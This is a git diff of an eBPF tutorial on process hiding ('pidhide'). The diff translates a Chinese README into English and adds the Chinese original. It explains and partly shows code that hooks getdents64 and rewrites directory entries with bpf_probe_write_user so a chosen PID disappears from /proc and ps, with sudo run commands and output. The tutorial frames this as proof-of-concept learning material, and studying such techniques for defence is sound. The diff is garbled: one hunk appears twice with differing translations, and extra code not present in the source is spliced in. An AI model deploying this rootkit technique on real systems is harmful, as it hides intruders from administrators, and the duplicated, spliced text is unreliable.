helper functions used by eBPF programs. These BPF helper functions are the main way that eBPF programs interact with the kernel. 
+- The "bpf_tracing.h" header file for tracing events contains a number of macros and functions designed to simplify the operation of tracepoints for eBPF programs. +- The "bpf_core_read.h" header file provides a set of macros and functions for reading data from the kernel. -程序中定义了一系列的 map 结构,这些 map 是 eBPF 程序中的主要数据结构,它们用于在内核态和用户态之间共享数据,或者在 eBPF 程序中存储和传递数据。 +The program defines a series of map structures, which are the main data structures in an eBPF program, and are used to share data between the kernel and the user, or to store and transfer data within the eBPF program. -其中,"rb" 是一个 Ringbuffer 类型的 map,它用于从内核向用户态传递消息。Ringbuffer 是一种能在内核和用户态之间高效传递大量数据的数据结构。 +Among them, "rb" is a map of type Ringbuffer, which is used to pass messages from the kernel to the userland; Ringbuffer is a data structure that can efficiently pass large amounts of data between the kernel and the userland. -"map_buffs" 是一个 Hash 类型的 map,它用于存储目录项(dentry)的缓冲区地址。 +"map_buffs" is a map of type Hash which is used to store buffer addresses for directory entries. -"map_bytes_read" 是另一个 Hash 类型的 map,它用于在数据循环中启用搜索。 +"map_bytes_read" is another Hash-type map that is used to enable searching in data loops. -"map_to_patch" 是另一个 Hash 类型的 map,存储了需要被修改的目录项(dentry)的地址。 +"map_to_patch" is another Hash type map that stores the address of the directory entry (dentry) that needs to be modified. -"map_prog_array" 是一个 Prog Array 类型的 map,它用于保存程序的尾部调用。 +"map_prog_array" is a map of type Prog Array, which is used to store the tail calls of a programme. -程序中的 "target_ppid" 和 "pid_to_hide_len"、"pid_to_hide" 是几个重要的全局变量,它们分别存储了目标父进程的 PID、需要隐藏的 PID 的长度以及需要隐藏的 PID。 +The "target_ppid" and "pid_to_hide_len" and "pid_to_hide" in the program are a few important global variables that store the PID of the target parent process, the length of the PID that needs to be hidden, and the PID that needs to be hidden, respectively. -接下来的代码部分,程序定义了一个名为 "linux_dirent64" 的结构体,这个结构体代表一个 Linux 目录项。然后程序定义了两个函数,"handle_getdents_enter" 和 "handle_getdents_exit",这两个函数分别在 getdents64 系统调用的入口和出口被调用,用于实现对目录项的操作。 +In the next part of the code, the program defines a structure called "linux_dirent64", which represents a Linux directory entry. The program then defines two functions, "handle_getdents_enter" and "handle_getdents_exit", which are called at the entry and exit of the getdents64 system call, respectively, and are used to implement operations on the directory entry. ```c @@ -132,23 +132,23 @@ int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx) } ``` -在这部分代码中,我们可以看到 eBPF 程序的一部分具体实现,该程序负责在 `getdents64` 系统调用的入口处进行处理。 +In this section of the code, we can see part of the implementation of the eBPF program that is responsible for the processing at the entry point of the `getdents64` system call. -我们首先声明了几个全局的变量。其中 `target_ppid` 代表我们要关注的目标父进程的 PID。如果这个值为 0,那么我们将关注所有的进程。`pid_to_hide_len` 和 `pid_to_hide` 则分别用来存储我们要隐藏的进程的 PID 的长度和 PID 本身。这个 PID 会转化成 `/proc/` 目录下的一个文件夹的名称,因此被隐藏的进程在 `/proc/` 目录下将无法被看到。 +We start by declaring a few global variables. The `target_ppid` represents the PID of the target parent we want to focus on, and if this value is 0, then we will focus on all processes. `pid_to_hide_len` and `pid_to_hide` are used to store the length of the PID of the process we want to hide from, and the PID itself, respectively. This PID is translated into the name of a folder in the `/proc/` directory, so the hidden process will not be visible in the `/proc/` directory. 
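+
+To see concretely what `ps` reads, the following small user-space sketch (an assumed illustration, not part of the tutorial code) lists `/proc` through the raw `getdents64` system call; these directory entries are exactly the data that the eBPF program rewrites later on:
+
+```c
+// Minimal demo: enumerate /proc the way ps does, via getdents64.
+// Error handling and repeated reads are omitted for brevity.
+#define _GNU_SOURCE
+#include <fcntl.h>
+#include <stdio.h>
+#include <sys/syscall.h>
+#include <unistd.h>
+
+struct linux_dirent64 {
+	unsigned long long d_ino;    /* inode number */
+	long long          d_off;    /* offset to the next entry */
+	unsigned short     d_reclen; /* length of this record */
+	unsigned char      d_type;   /* file type */
+	char               d_name[]; /* entry name */
+};
+
+int main(void)
+{
+	char buf[8192];
+	int fd = open("/proc", O_RDONLY | O_DIRECTORY);
+	long n = syscall(SYS_getdents64, fd, buf, sizeof(buf)); /* one batch only */
+	for (long off = 0; off < n;) {
+		struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + off);
+		printf("%s\n", d->d_name); /* a hidden PID would simply not appear here */
+		off += d->d_reclen;       /* stride to the next record */
+	}
+	close(fd);
+	return 0;
+}
+```
+
+Once the eBPF program patches the `d_reclen` of the entry preceding the target, a loop like the one above strides right over the hidden entry, which is exactly why tools such as `ps` stop seeing it.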
-接下来,我们声明了一个名为 `linux_dirent64` 的结构体。这个结构体代表一个 Linux 目录项,包含了一些元数据,如 inode 号、下一个目录项的偏移、当前目录项的长度、文件类型以及文件名。 +Next, we declare a structure called `linux_dirent64`. This structure represents a Linux directory entry and contains metadata such as the inode number, the offset of the next directory entry, the length of the current directory entry, the file type, and the filename. -然后是 `getdents64` 函数的原型。这个函数是 Linux 系统调用,用于读取一个目录的内容。我们的目标就是在这个函数执行的过程中,对目录项进行修改,以实现进程隐藏。 +Then there is the prototype for the `getdents64` function. This function is a Linux system call that reads the contents of a directory. Our goal is to modify the directory entries during the execution of this function to enable process hiding. -随后的部分是 eBPF 程序的具体实现。我们在 `getdents64` 系统调用的入口处定义了一个名为 `handle_getdents_enter` 的函数。这个函数首先获取了当前进程的 PID 和线程组 ID,然后检查这个进程是否是我们关注的进程。如果我们设置了 `target_ppid`,那么我们就只关注那些父进程的 PID 为 `target_ppid` 的进程。如果 `target_ppid` 为 0,我们就关注所有进程。 +The subsequent section is the concrete implementation of the eBPF program. We define a function called `handle_getdents_enter` at the entry point of the `getdents64` system call. This function first gets the PID and thread group ID of the current process, and then checks to see if it is the process we are interested in. If we set `target_ppid`, then we only focus on processes whose parent has a PID of `target_ppid`. If `target_ppid` is 0, we focus on all processes. -在确认了当前进程是我们关注的进程之后,我们将 `getdents64` 系统调用的参数保存到一个 map 中,以便在系统调用返回时使用。我们特别关注 `getdents64` 系统调用的第二个参数,它是一个指向 `linux_dirent64` 结构体的指针,代表了系统调用要读取的目录的内容。我们将这个指针以及当前的 PID 和线程组 ID 作为键值对保存到 `map_buffs` 这个 map 中。 +After confirming that the current process is the one we are interested in, we save the arguments to the `getdents64` system call into a map to be used when the system call returns. In particular, we focus on the second argument to the `getdents64` system call, which is a pointer to the `linux_dirent64` structure representing the contents of the directory to be read by the system call. We save this pointer, along with the current PID and thread group ID, as a key-value pair in the `map_buffs` map. -至此,我们完成了 `getdents64` 系统调用入口处的处理。在系统调用返回时,我们将会在 `handle_getdents_exit` 函数中,对目录项进行修改,以实现进程隐藏。 +This completes the processing at the entry point of the `getdents64` system call. When the system call returns, we will modify the directory entry in the `handle_getdents_exit` function to hide the process. -在接下来的代码段中,我们将要实现在 `getdents64` 系统调用返回时的处理。我们主要的目标就是找到我们想要隐藏的进程,并且对目录项进行修改以实现隐藏。 +In the next snippet, we will implement the handling at the return of the `getdents64` system call. Our main goal is to find the process we want to hide and modify the directory entry to hide it. -我们首先定义了一个名为 `handle_getdents_exit` 的函数,它将在 `getdents64` 系统调用返回时被调用。 +We start by defining a function called `handle_getdents_exit` that will be called when the `getdents64` system call returns. ```c @@ -226,11 +226,11 @@ int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx) ``` -在这个函数中,我们首先获取了当前进程的 PID 和线程组 ID,然后检查系统调用是否读取到了目录的内容。如果没有读取到内容,我们就直接返回。 +In this function, we first get the PID and thread group ID of the current process, and then check to see if the system call has read the contents of the directory. If it didn't read the contents, we just return. -然后我们从 `map_buffs` 这个 map 中获取 `getdents64` 系统调用入口处保存的目录内容的地址。如果我们没有保存过这个地址,那么就没有必要进行进一步的处理。 +Then we get the address of the directory contents saved at the entry point of the `getdents64` system call from the `map_buffs` map. 
If we haven't saved this address, then there's no need to do any further processing.

-接下来的部分有点复杂,我们用了一个循环来迭代读取目录的内容,并且检查是否有我们想要隐藏的进程的 PID。如果我们找到了,我们就用 `bpf_tail_call` 函数跳转到 `handle_getdents_patch` 函数,进行实际的隐藏操作。
+The next part is a bit more complicated. We use a loop to iterate over the directory contents and check whether they contain the PID of the process we want to hide; if they do, we use the `bpf_tail_call` function to jump to the `handle_getdents_patch` function, which performs the actual hiding.

```c
SEC("tp/syscalls/sys_exit_getdents64")
@@ -284,26 +284,26 @@ int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx)
```

-在 `handle_getdents_patch` 函数中,我们首先检查我们是否已经找到了我们想要隐藏的进程的 PID。然后我们读取目录项的内容,并且修改 `d_reclen` 字段,让它覆盖下一个目录项,这样就可以隐藏我们的目标进程了。
+In the `handle_getdents_patch` function, we first check that we have found the PID of the process we want to hide. We then read the contents of the directory entries and modify the `d_reclen` field of the preceding entry so that it also covers the next entry, the one belonging to our target process, thus hiding it.

-在这个过程中,我们用到了 `bpf_probe_read_user`、`bpf_probe_read_user_str`、`bpf_probe_write_user` 这几个函数来读取和写入用户空间的数据。这是因为在内核空间,我们不能直接访问用户空间的数据,必须使用这些特殊的函数。
+In this process, we use the functions `bpf_probe_read_user`, `bpf_probe_read_user_str`, and `bpf_probe_write_user` to read and write user-space data, because kernel code cannot access user-space memory directly and must go through these special helpers.

-在我们完成隐藏操作后,我们会向一个名为 `rb` 的环形缓冲区发送一个事件,表示我们已经成功地隐藏了一个进程。我们用 `bpf_ringbuf_reserve` 函数来预留缓冲区空间,然后将事件的数据填充到这个空间,并最后用 `bpf_ringbuf_submit` 函数将事件提交到缓冲区。
+After we finish the hiding operation, we send an event to a ring buffer called `rb`, indicating that we have successfully hidden a process. We reserve space in the buffer with the `bpf_ringbuf_reserve` function, fill that space with the event's data, and finally submit the event to the buffer with the `bpf_ringbuf_submit` function.

-最后,我们清理了之前保存在 map 中的数据,并返回。
+Finally, we clean up the data previously saved in the maps and return.

-这段代码是在 eBPF 环境下实现进程隐藏的一个很好的例子。通过这个例子,我们可以看到 eBPF 提供的丰富的功能,如系统调用跟踪、map 存储、用户空间数据访问、尾调用等。这些功能使得我们能够在内核空间实现复杂的逻辑,而不需要修改内核代码。
+This code is a good example of process hiding with eBPF. Through it we can see the rich features eBPF provides, such as system call tracing, map storage, user-space data access, and tail calls. These features allow us to implement complex logic in kernel space without modifying the kernel code.

-## 用户态 eBPF 程序实现
+## User-Space eBPF Program Implementation

-我们在用户态的 eBPF 程序中主要进行了以下几个操作:
+The user-space side of the program mainly performs the following operations:

-1. 打开 eBPF 程序。
-2. 设置我们想要隐藏的进程的 PID。
-3. 验证并加载 eBPF 程序。
-4. 等待并处理由 eBPF 程序发送的事件。
+1. Open the eBPF program.
+2. Set the PID of the process we want to hide.
+3. Verify and load the eBPF program.
+4. Wait for and process events sent by the eBPF program.

-首先,我们打开了 eBPF 程序。这个过程是通过调用 `pidhide_bpf__open` 函数实现的。如果这个过程失败了,我们就直接返回。
+First, we open the eBPF program. This is done by calling the `pidhide_bpf__open` function. If this step fails, we simply return.

```c
skel = pidhide_bpf__open();
@@ -314,7 +314,7 @@ int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx)
}
```

-接下来,我们设置了我们想要隐藏的进程的 PID。这个过程是通过将 PID 保存到 eBPF 程序的 `rodata` 区域实现的。默认情况下,我们隐藏的是当前进程。
+Next, we set the PID of the process we want to hide, which is done by saving the PID into the `rodata` area of the eBPF program. By default, we hide the current process.
-在这个过程中,我们用到了 `bpf_probe_read_user`、`bpf_probe_read_user_str`、`bpf_probe_write_user` 这几个函数来读取和写入用户空间的数据。这是因为在内核空间,我们不能直接访问用户空间的数据,必须使用这些特殊的函数。
+In this process, we use the helper functions `bpf_probe_read_user`, `bpf_probe_read_user_str`, and `bpf_probe_write_user` to read and write user-space data, because kernel-space code cannot access user-space memory directly and must go through these special helpers.

-在我们完成隐藏操作后,我们会向一个名为 `rb` 的环形缓冲区发送一个事件,表示我们已经成功地隐藏了一个进程。我们用 `bpf_ringbuf_reserve` 函数来预留缓冲区空间,然后将事件的数据填充到这个空间,并最后用 `bpf_ringbuf_submit` 函数将事件提交到缓冲区。
+After we finish the hiding operation, we send an event to a ring buffer named `rb` to indicate that we have successfully hidden a process. We reserve buffer space with the `bpf_ringbuf_reserve` function, fill that space with the event data, and finally submit the event to the buffer with the `bpf_ringbuf_submit` function.

-最后,我们清理了之前保存在 map 中的数据,并返回。
+Finally, we clean up the data previously saved in the maps and return.

-这段代码是在 eBPF 环境下实现进程隐藏的一个很好的例子。通过这个例子,我们可以看到 eBPF 提供的丰富的功能,如系统调用跟踪、map 存储、用户空间数据访问、尾调用等。这些功能使得我们能够在内核空间实现复杂的逻辑,而不需要修改内核代码。
+This code is a good example of implementing process hiding with eBPF. It shows the rich feature set eBPF provides, such as system call tracing, map storage, user-space data access, and tail calls, which together let us implement complex logic in kernel space without modifying the kernel code.

-## 用户态 eBPF 程序实现
+## Userspace eBPF Program Implementation

-我们在用户态的 eBPF 程序中主要进行了以下几个操作:
+In the userspace program, we mainly perform the following operations:

-1. 打开 eBPF 程序。
-2. 设置我们想要隐藏的进程的 PID。
-3. 验证并加载 eBPF 程序。
-4. 等待并处理由 eBPF 程序发送的事件。
+1. Open the eBPF program.
+2. Set the PID of the process we want to hide.
+3. Verify and load the eBPF program.
+4. Wait for and process events sent by the eBPF program.

-首先,我们打开了 eBPF 程序。这个过程是通过调用 `pidhide_bpf__open` 函数实现的。如果这个过程失败了,我们就直接返回。
+First, we open the eBPF program. This is done by calling the `pidhide_bpf__open` function. If this step fails, we return immediately.

```c
skel = pidhide_bpf__open();
@@ -314,7 +314,7 @@ int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx)
}
```

-接下来,我们设置了我们想要隐藏的进程的 PID。这个过程是通过将 PID 保存到 eBPF 程序的 `rodata` 区域实现的。默认情况下,我们隐藏的是当前进程。
+Next, we set the PID of the process we want to hide. This is done by writing the PID into the `rodata` section of the eBPF program. By default, we hide the current process.

```c
char pid_to_hide[10];
@@ -328,7 +328,7 @@ int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx)
skel->rodata->target_ppid = env.target_ppid;
```

-然后,我们验证并加载 eBPF 程序。这个过程是通过调用 `pidhide_bpf__load` 函数实现的。如果这个过程失败了,我们就进行清理操作。
+We then verify and load the eBPF program. This is done by calling the `pidhide_bpf__load` function. If this step fails, we jump to the cleanup path.

```c
err = pidhide_bpf__load(skel);
@@ -339,7 +339,7 @@ int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx)
}
```

-最后,我们等待并处理由 eBPF 程序发送的事件。这个过程是通过调用 `ring_buffer__poll` 函数实现的。在这个过程中,我们每隔一段时间就检查一次环形缓冲区中是否有新的事件。如果有,我们就调用 `handle_event` 函数来处理这个事件。
+Finally, we wait for and process events sent by the eBPF program. This is done by calling the `ring_buffer__poll` function: we periodically check the ring buffer for new events, and whenever one arrives we call the `handle_event` function to process it.

```c
printf("Successfully started!\n");
@@ -361,9 +361,9 @@ while (!exiting)
}
```

-`handle_event` 函数中,我们根据事件的内容打印了相应的消息。这个函数的参数包括一个上下文,事件的数据,以及数据的大小。我们首先将事件的数据转换为 `event` 结构体,然后根据 `success` 字段判断这个事件是否表示成功隐藏了一个进程,最后打
+In the `handle_event` function, we print an appropriate message based on the content of the event. The arguments to this function are a context, the event data, and the size of the data. We first cast the event data to an `event` structure, then use the `success` field to determine whether the event indicates that a process was successfully hidden, and finally print the corresponding message.

-印相应的消息。

```c
static int handle_event(void *ctx, void *data, size_t data_sz)
@@ -377,36 +377,28 @@ static int handle_event(void *ctx, void *data, size_t data_sz)
}
```

-这段代码展示了如何在用户态使用 eBPF 程序来实现进程隐藏的功能。我们首先打开 eBPF 程序,然后设置我们想要隐藏的进程的 PID,再验证并加载 eBPF 程序,最后等待并处理由 eBPF 程序发送的事件。这个过程中,我们使用了 eBPF 提供的一些高级功能,如环形缓冲区和事件处理,这些功能使得我们能够在用户态方便地与内核态的 eBPF 程序进行交互。
+This code shows how a userspace program works together with the eBPF program to hide a process: we open the eBPF program, set the PID of the process we want to hide, verify and load the program, and finally wait for and process the events it sends. Along the way we use some of the higher-level facilities eBPF provides, such as ring buffers and event handling, which make it easy for the userspace side to interact with the eBPF program running in kernel space.
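+For completeness, here is a condensed sketch of how these fragments fit into the usual libbpf skeleton lifecycle. It is an outline under that assumption rather than the tool's exact source: the `pidhide.skel.h` header is the skeleton bpftool generates, error handling is elided, and the real tool additionally fills the `map_prog_array` tail-call map, which is omitted here:
+
+```c
+#include <stdio.h>
+#include <string.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <bpf/libbpf.h>
+#include "pidhide.skel.h" /* hypothetical: generated via `bpftool gen skeleton` */
+
+static volatile bool exiting = false;
+
+static int handle_event(void *ctx, void *data, size_t data_sz)
+{
+    /* print the event, as in the handler shown above */
+    return 0;
+}
+
+int main(void)
+{
+    char pid_str[10];
+    struct pidhide_bpf *skel = pidhide_bpf__open();           /* 1. open */
+
+    snprintf(pid_str, sizeof(pid_str), "%d", getpid());       /* 2. set rodata */
+    strncpy(skel->rodata->pid_to_hide, pid_str, sizeof(skel->rodata->pid_to_hide));
+    skel->rodata->pid_to_hide_len = strlen(pid_str) + 1;
+
+    pidhide_bpf__load(skel);                                  /* 3. verify and load */
+    pidhide_bpf__attach(skel);                                /* 4. attach tracepoints */
+
+    struct ring_buffer *rb = ring_buffer__new(
+        bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL);
+    while (!exiting)
+        ring_buffer__poll(rb, 100 /* timeout, ms */);         /* 5. poll for events */
+
+    ring_buffer__free(rb);
+    pidhide_bpf__destroy(skel);                               /* 6. clean up */
+    return 0;
+}
+```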
-完整源代码:
+Full source code: [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide)

-> 本文所示技术仅为概念验证,仅供学习使用,严禁用于不符合法律法规要求的场景。
+> The techniques shown in this tutorial are a proof of concept intended for learning purposes only; they must not be used in scenarios that violate legal or regulatory requirements.

-## 编译运行,隐藏 PID
+## Compile and Run

-首先,我们需要编译 eBPF 程序:
+First, we need to compile the eBPF program:

```bash
make
```

-然后,假设我们想要隐藏进程 ID 为 1534 的进程,可以运行如下命令:
+Then, assuming we want to hide the process with PID 1534, we can run the following command:

```sh
sudo ./pidhide --pid-to-hide 1534
```

-这条命令将使所有尝试读取 `/proc/` 目录的操作都无法看到 PID 为 1534 的进程。例如,我们可以选择一个进程进行隐藏:
+This command makes the process with PID 1534 invisible to any operation that reads the `/proc/` directory. For example, we can pick a process to hide:

```console
$ ps -aux | grep 1534
yunwei 1534 0.0 0.0 244540 6848 ? Ssl 6月02 0:00 /usr/libexec/gvfs-mtp-volume-monitor
yunwei 32065 0.0 0.0 17712 2580 pts/1 S+ 05:43 0:00 grep --color=auto 1534
```

-此时通过 ps 命令可以看到进程 ID 为 1534 的进程。但是,如果我们运行 `sudo ./pidhide --pid-to-hide 1534`,再次运行 `ps -aux | grep 1534`,就会发现进程 ID 为 1534 的进程已经不见了。
+At this point the process with PID 1534 is still visible to `ps`. However, once we run `sudo ./pidhide --pid-to-hide 1534` and execute `ps -aux | grep 1534` again, the process with PID 1534 is gone.

```console
$ sudo ./pidhide --pid-to-hide 1534
Hiding PID 1534
@@ -422,8 +414,6 @@ Hid PID from program 31640 (ps)
Hid PID from program 31649 (ps)
```

-这个程序将匹配这个 pid 的进程隐藏,使得像 `ps` 这样的工具无法看到,我们可以通过 `ps aux | grep 1534` 来验证。
+The program hides any process matching this PID so that tools such as `ps` cannot see it, which we can verify with `ps aux | grep 1534`.

```console
$ ps -aux | grep 1534
root 31523 0.1 0.0 22004 5616 pts/2 S+ 05:42 0:00 sudo ./pidhide -p 1534
@@ -432,8 +422,8 @@ root 31525 0.3 0.0 3808 2456 pts/3 S+ 05:42 0:00 ./pidhide -p
yunwei 31583 0.0 0.0 17712 2612 pts/1 S+ 05:42 0:00 grep --color=auto 1534
```

-## 总结
+## Summary

-通过本篇 eBPF 入门实践教程,我们深入了解了如何使用 eBPF 来隐藏进程或文件信息。我们学习了如何编写和加载 eBPF 程序,如何通过 eBPF 拦截系统调用并修改它们的行为,以及如何将这些知识应用到实际的网络安全和防御工作中。此外,我们也了解了 eBPF 的强大性,尤其是它能在不需要修改内核源代码或重启内核的情况下,允许用户在内核中执行自定义代码的能力。
+Through this hands-on eBPF tutorial, we took a close look at how to use eBPF to hide process or file information. We learned how to write and load eBPF programs, how to intercept system calls with eBPF and modify their behavior, and how to apply this knowledge to practical security and defense work. We also saw the power of eBPF, in particular its ability to let users run custom code in the kernel without modifying the kernel source code or rebooting the kernel.

-您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。
+You can also visit our tutorial code repository at [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website at [https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and the complete tutorial.

+> The original link of this article:
diff --git a/src/24-hide/README.zh.md b/src/24-hide/README.zh.md
new file mode 100644
index 0000000..e841921
--- /dev/null
+++ b/src/24-hide/README.zh.md
@@ -0,0 +1,439 @@
+# eBPF 开发实践:使用 eBPF 隐藏进程或文件信息
+
+eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。
+
+在本篇教程中,我们将展示如何利用 eBPF 来隐藏进程或文件信息,这是网络安全和防御领域中一种常见的技术。
+
+## 背景知识与实现机制
+
+"进程隐藏" 能让特定的进程对操作系统的常规检测机制变得不可见。在黑客攻击或系统防御的场景中,这种技术都可能被应用。具体来说,Linux 系统中每个进程都在 /proc/ 目录下有一个以其进程 ID 命名的子文件夹,包含了该进程的各种信息。`ps` 命令就是通过查找这些文件夹来显示进程信息的。因此,如果我们能隐藏某个进程的 /proc/ 文件夹,就能让这个进程对 `ps` 命令等检测手段“隐身”。
+
+要实现进程隐藏,关键在于操作 `/proc/` 目录。在 Linux 中,`getdents64` 系统调用可以读取目录下的文件信息。我们可以通过挂接这个系统调用,修改它返回的结果,从而达到隐藏文件的目的。实现这个功能需要使用到 eBPF 的 `bpf_probe_write_user` 功能,它可以修改用户空间的内存,因此能用来修改 `getdents64` 返回的结果。
+
+下面,我们会详细介绍如何在内核态和用户态编写 eBPF 程序来实现进程隐藏。
+
+### 内核态 eBPF 程序实现
+
+接下来,我们将详细介绍如何在内核态编写 eBPF 程序来实现进程隐藏。首先是 eBPF 程序的起始部分:
+
+```c
+// SPDX-License-Identifier: BSD-3-Clause
+#include "vmlinux.h"
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_tracing.h>
+#include <bpf/bpf_core_read.h>
+#include "common.h"
+
+char LICENSE[] SEC("license") = "Dual BSD/GPL";
+
+// Ringbuffer Map to pass messages from kernel to user
+struct {
+    __uint(type, BPF_MAP_TYPE_RINGBUF);
+    __uint(max_entries, 256 * 1024);
+} rb SEC(".maps");
+
+// Map to fold the dents buffer addresses
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __uint(max_entries, 8192);
+    __type(key, size_t);
+    __type(value, long unsigned int);
+} map_buffs SEC(".maps");
+
+// Map used to enable searching through the
+// data in a loop
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __uint(max_entries, 8192);
+    __type(key, size_t);
+    __type(value, int);
+} map_bytes_read SEC(".maps");
+
+// Map with address of actual
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __uint(max_entries, 8192);
+    __type(key, size_t);
+    __type(value, long unsigned int);
+} map_to_patch SEC(".maps");
+
+// Map to hold program tail calls
+struct {
+    __uint(type, BPF_MAP_TYPE_PROG_ARRAY);
+    __uint(max_entries, 5);
+    __type(key, __u32);
+    __type(value, __u32);
+} map_prog_array SEC(".maps");
+```
+
+我们首先需要理解这个 eBPF 程序的基本构成和使用到的几个重要组件。前几行引用了几个重要的头文件,如 "vmlinux.h"、"bpf_helpers.h"、"bpf_tracing.h" 和 "bpf_core_read.h"。这些文件提供了 eBPF 编程所需的基础设施和一些重要的函数或宏。
+
+- 
"vmlinux.h" 是一个包含了完整的内核数据结构的头文件,是从 vmlinux 内核二进制中提取的。使用这个头文件,eBPF 程序可以访问内核的数据结构。 +- "bpf_helpers.h" 头文件中定义了一系列的宏,这些宏是 eBPF 程序使用的 BPF 助手(helper)函数的封装。这些 BPF 助手函数是 eBPF 程序和内核交互的主要方式。 +- "bpf_tracing.h" 是用于跟踪事件的头文件,它包含了许多宏和函数,这些都是为了简化 eBPF 程序对跟踪点(tracepoint)的操作。 +- "bpf_core_read.h" 头文件提供了一组用于从内核读取数据的宏和函数。 + +程序中定义了一系列的 map 结构,这些 map 是 eBPF 程序中的主要数据结构,它们用于在内核态和用户态之间共享数据,或者在 eBPF 程序中存储和传递数据。 + +其中,"rb" 是一个 Ringbuffer 类型的 map,它用于从内核向用户态传递消息。Ringbuffer 是一种能在内核和用户态之间高效传递大量数据的数据结构。 + +"map_buffs" 是一个 Hash 类型的 map,它用于存储目录项(dentry)的缓冲区地址。 + +"map_bytes_read" 是另一个 Hash 类型的 map,它用于在数据循环中启用搜索。 + +"map_to_patch" 是另一个 Hash 类型的 map,存储了需要被修改的目录项(dentry)的地址。 + +"map_prog_array" 是一个 Prog Array 类型的 map,它用于保存程序的尾部调用。 + +程序中的 "target_ppid" 和 "pid_to_hide_len"、"pid_to_hide" 是几个重要的全局变量,它们分别存储了目标父进程的 PID、需要隐藏的 PID 的长度以及需要隐藏的 PID。 + +接下来的代码部分,程序定义了一个名为 "linux_dirent64" 的结构体,这个结构体代表一个 Linux 目录项。然后程序定义了两个函数,"handle_getdents_enter" 和 "handle_getdents_exit",这两个函数分别在 getdents64 系统调用的入口和出口被调用,用于实现对目录项的操作。 + +```c + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// These store the string representation +// of the PID to hide. This becomes the name +// of the folder in /proc/ +const volatile int pid_to_hide_len = 0; +const volatile char pid_to_hide[MAX_PID_LEN]; + +// struct linux_dirent64 { +// u64 d_ino; /* 64-bit inode number */ +// u64 d_off; /* 64-bit offset to next structure */ +// unsigned short d_reclen; /* Size of this dirent */ +// unsigned char d_type; /* File type */ +// char d_name[]; /* Filename (null-terminated) */ }; +// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); +SEC("tp/syscalls/sys_enter_getdents64") +int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + int pid = pid_tgid >> 32; + unsigned int fd = ctx->args[0]; + unsigned int buff_count = ctx->args[2]; + + // Store params in map for exit function + struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1]; + bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY); + + return 0; +} +``` + +在这部分代码中,我们可以看到 eBPF 程序的一部分具体实现,该程序负责在 `getdents64` 系统调用的入口处进行处理。 + +我们首先声明了几个全局的变量。其中 `target_ppid` 代表我们要关注的目标父进程的 PID。如果这个值为 0,那么我们将关注所有的进程。`pid_to_hide_len` 和 `pid_to_hide` 则分别用来存储我们要隐藏的进程的 PID 的长度和 PID 本身。这个 PID 会转化成 `/proc/` 目录下的一个文件夹的名称,因此被隐藏的进程在 `/proc/` 目录下将无法被看到。 + +接下来,我们声明了一个名为 `linux_dirent64` 的结构体。这个结构体代表一个 Linux 目录项,包含了一些元数据,如 inode 号、下一个目录项的偏移、当前目录项的长度、文件类型以及文件名。 + +然后是 `getdents64` 函数的原型。这个函数是 Linux 系统调用,用于读取一个目录的内容。我们的目标就是在这个函数执行的过程中,对目录项进行修改,以实现进程隐藏。 + +随后的部分是 eBPF 程序的具体实现。我们在 `getdents64` 系统调用的入口处定义了一个名为 `handle_getdents_enter` 的函数。这个函数首先获取了当前进程的 PID 和线程组 ID,然后检查这个进程是否是我们关注的进程。如果我们设置了 `target_ppid`,那么我们就只关注那些父进程的 PID 为 `target_ppid` 的进程。如果 `target_ppid` 为 0,我们就关注所有进程。 + +在确认了当前进程是我们关注的进程之后,我们将 `getdents64` 系统调用的参数保存到一个 map 中,以便在系统调用返回时使用。我们特别关注 `getdents64` 系统调用的第二个参数,它是一个指向 `linux_dirent64` 结构体的指针,代表了系统调用要读取的目录的内容。我们将这个指针以及当前的 PID 和线程组 ID 作为键值对保存到 `map_buffs` 这个 map 中。 + +至此,我们完成了 `getdents64` 系统调用入口处的处理。在系统调用返回时,我们将会在 `handle_getdents_exit` 函数中,对目录项进行修改,以实现进程隐藏。 + +在接下来的代码段中,我们将要实现在 `getdents64` 系统调用返回时的处理。我们主要的目标就是找到我们想要隐藏的进程,并且对目录项进行修改以实现隐藏。 + +我们首先定义了一个名为 `handle_getdents_exit` 的函数,它将在 `getdents64` 系统调用返回时被调用。 + 
